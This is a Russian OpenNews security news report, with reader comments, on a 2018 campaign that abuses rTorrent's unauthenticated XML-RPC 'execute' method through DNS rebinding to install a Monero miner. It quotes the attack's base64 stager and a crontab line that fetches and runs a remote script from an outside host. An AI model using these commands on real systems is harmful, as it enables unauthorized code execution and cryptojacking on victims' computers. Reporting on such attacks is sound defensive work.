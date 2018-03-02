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02.03.2018 11:37  Атака на системы с rTorrent для скрытого майнинга криптовалюты

Исследователи из компании F5 выявили волну атак на пользовательские системы, в которых запущен свободный консольный torrent-клиент rTorrent, использующий XML-RPC для взаимодействия с фронтэндами с реализацией интерфейсов пользователя.

Для выполнения своего кода в системе атакующие эксплуатируют особенность реализации XML-RPC в rTorrent, в которой не отключён метод "execute", позволяющий выполнить любой shell-код в системе. В ходе атаки в систему устанавливается собранный для unix-подобных систем инструментарий для майнинга криптовалюты Monero (XMR). На текущий момент на одном из связанных с атакой кошельков уже накопилось 13 XMR, что соответствует примерно 4200 долларам США.

Как и в случае с недавней уязвимостью в BitTorrent-клиенте Transmission, интерфейс XML-RPC в rTorrent доступен без аутентификации и включает команды, которые можно использовать для выполнения кода в системе. По умолчанию rTorrent принимает запросы только на внутреннем интерфейсе localhost (127.0.0.1), недоступном из вне, поэтому для отправки команд атакующие применяют технику "DNS rebinding". Атака производится когда пользователь открывает в браузере подконтрольные злоумышленнику страницы на системе в которой также выполняется rTorrent.

Выполняемый в браузере JavaScript-код отправляет произвольный запрос на localhost через вызов XMLHttpRequest(). Для обхода защиты от выхода за пределы области текущего домена (cross-origin) используется метод смены имени хоста в DNS - на DNS-сервере атакующих настраивается поочерёдная отдача двух IP-адресов: на первый запрос отдаётся реальный IP сервера со страницей, а затем возвращается 127.0.0.1. Время жизни (TTL) для первого ответа выставляется в минимальное значение, поэтому при открытии страницы браузер определяет реальный IP сервера атакущего и загружает содержимое страницы. На странице запускается JavaScript-код, который ожидает истечения TTL и отправляет второй запрос, который теперь определяет хост как 127.0.0.1, что приводит к обращению к внутреннему сетевому интерфейсу компьютера пользователя без ограничений cross-origin.

Первым делом атакующие отправляют проверочный POST запрос с XML-RPC-методом "download_list". Если запрос обработан успешно, следом отправляется запрос "execute", в ходе которого на системе пользователя выполняется команда 


   echo KGNy...tCg== |base64 -d|bash

которая после декодирования из формата base64 преоборазуется в 


    (crontab -l 2>/dev/null|sed '/wget/d'; echo "5 * * * * wget -qO- lyzhenko.ru/.r|bash")|crontab –

Указанный код прописывает в crontab загрузку основного скрипта, который вначале пытается завершить процессы конкурирующих вредоносных систем майнинга, удаляя процессы по маскам "miner", "xmr", "wnTKYg", "imWBR" и "ddg", а также убивает все процессы sshd.

Далее устанавливается соединение со скрытым сервисом Tor c которого загружается непосредственно приложение для майнинга. Для доступа к Tor применяется шлюз Tor2Web, позволяющий обратиться к скрытому сервису без установки Tor при помощи обычного web-запроса.



  1. Главная ссылка к новости (https://f5.com/labs/articles/t...)
  2. OpenNews: Уязвимость в BitTorrent-клиенте Transmission, позволяющая выполнить код
  3. OpenNews: Релиз qBittorrent 4.0.0
  4. OpenNews: Проект Elementary OS представил BitTorrent-клиент Torrential
  5. OpenNews: Второй взлом инфраструктуры BitTorrent-клиента Transmission
  6. OpenNews: Релиз BitTorrent-клиента KTorrent 5.0
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: torrent, rtorrent
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  • 1.1, freehck, 12:05, 02/03/2018 [ответить] [смотреть все]    [к модератору]
    		• –1 +/
    Увидел новость -- написал регистратору. Больше писем -- быстрее удалят. :)
     
     
  • 2.3, Аноним, 12:12, 02/03/2018 [^] [ответить] [смотреть все]     [к модератору]
    		• +2 +/
    Нужно хостеру писать, а не регистратору Это типичный взломанный сайт с необновл... весь текст скрыт [показать]
     
     
  • 3.15, Аноним, 13:12, 02/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
    		• +/
    Заметьте, как на этом сайте всё прекрасно и гармонично CMS, заголовок, его орфо... весь текст скрыт [показать]
     
     
  • 4.18, сайтостроитель, 13:16, 02/03/2018 [^] [ответить] [смотреть все]    [к модератору]  
    		• +/
    > Заметьте, как на этом сайте всё прекрасно и гармонично. CMS, заголовок, его
    > орфография, наполнение и сабжевый скрипт.

    йа у мамы веб-девелопер!
    (и ничем не хуже владельцев мильена аналогичных сайтов-с-cms)

     
  • 3.20, freehck, 13:38, 02/03/2018 [^] [ответить] [смотреть все]    [к модератору]  
    		• +/
    > Нужно хостеру писать, а не регистратору.

    Не один ли хрен?

     
  • 1.2, freehck, 12:10, 02/03/2018 [ответить] [смотреть все]    [к модератору]  
    		• –1 +/
    > В ходе атаки в систему устанавливается собранный для unix-подобных
    > систем инструментарий для майнинга криптовалюты Monero (XMR). На
    > текущий момент на одном из связанных с атакой кошельков уже накопилось
    > 13 XMR, что соответствует примерно 4200 долларам США.

    Кто-то за такие деньги 2 месяца пашет, а кракер заработал их своими мозгами и предприимчивостью.
    Можно конечно много размышлять, этично это или же нет, однако уж с чем точно нельзя поспорить, так это с тем, что парень смекалистый.

     
     
  • 2.4, Аноним, 12:20, 02/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
    		• +1 +/
    То что он смекалистый опровергает последняя строка кода с chmod И вообще, смека... весь текст скрыт [показать]
     
     
  • 3.12, Аноним, 12:57, 02/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
    		• +/
    А может он намеренно косит под дурачка, чтоб его не нашли ... весь текст скрыт [показать]
     
  • 3.14, имя, 13:01, 02/03/2018 [^] [ответить] [смотреть все]    [к модератору]  
    		• +2 +/
    в чем проблема с chmod? добавляет права на выполнение, запускает и затем удаляет файл
     
  • 2.9, Аноним, 12:42, 02/03/2018 [^] [ответить] [смотреть все]    [к модератору]  
    		• –1 +/
    в этом плане у нас во власти еще более предприимчивые люди, фбк не даст соврать
     
  • 2.16, Аноним, 13:13, 02/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
    		• +/
    Смекалистый не спалился бы ... весь текст скрыт [показать]
     
  • 2.19, Iaaa, 13:19, 02/03/2018 [^] [ответить] [смотреть все]    [к модератору]  
    		• –1 +/
    > Кто-то за такие деньги 2 месяца пашет, а кракер заработал их своими мозгами и предприимчивостью.
    > Можно конечно много размышлять, этично это или же нет, однако уж с чем точно нельзя поспорить, так это с тем, что парень смекалистый.

    Кто-то за такие деньги 2 месяца пашет, а взломщик (вор, бандит, громила, разводила - на выбор) заработал их своими мозгами и предприимчивостью.
    Можно конечно много размышлять, этично это или же нет, однако уж с чем точно нельзя поспорить, так это с тем, что парень смекалистый.

     
  • 1.5, anonymous, 12:26, 02/03/2018 [ответить] [смотреть все]    [к модератору]  
    		• +/
    охренеть. какой ... такое проектировал?
     
     
  • 2.7, IB, 12:33, 02/03/2018 [^] [ответить] [смотреть все]    [к модератору]  
    		• +2 +/
    В смысле кто проектировал такой DNS?

    Знают, борются, но legacy.

    С какого перепугу локально работающее приложение на localhost должно защищаться от внешних! атак.

     
  • 1.6, Яйцассыром, 12:33, 02/03/2018 [ответить] [смотреть все]    [к модератору]  
    		• +/
    >> а также убивает все процессы sshd.

    Подскажите, с каких это пор, в этих наших линуксах, кто-попало может кильнуть процесс запущенный от другого пользователя?

     
     
  • 2.8, Аноним, 12:40, 02/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
    		• +1 +/
    Ну ты попробуй прибей обычным юзером sshd от рута запущенный, потом расскажи об ... весь текст скрыт [показать]
     
  • 2.10, imho, 12:46, 02/03/2018 [^] [ответить] [смотреть все]    [к модератору]  
    		• +1 +/
    А кто сказал что он чужие убивает?
     
     
  • 3.17, нах, 13:13, 02/03/2018 [^] [ответить] [смотреть все]    [к модератору]  
    		• +/
    ну как бы редко sshd запускают от юзера, лазящего по порносайтам...

    хотя...

     
  • 2.11, Аноним, 12:56, 02/03/2018 [^] [ответить] [смотреть все]     [к модератору]  
    		• +/
    Если кто-то уже вломился в систему, то скорее всего под тем же юзером А если не... весь текст скрыт [показать]
     
  • 1.13, Аноним, 12:57, 02/03/2018 [ответить] [смотреть все]     [к модератору]  
    		• +/
    т е если rtorrent висит на отдельном компе, бояться нечего еще и запущен под ю... весь текст скрыт [показать]
     

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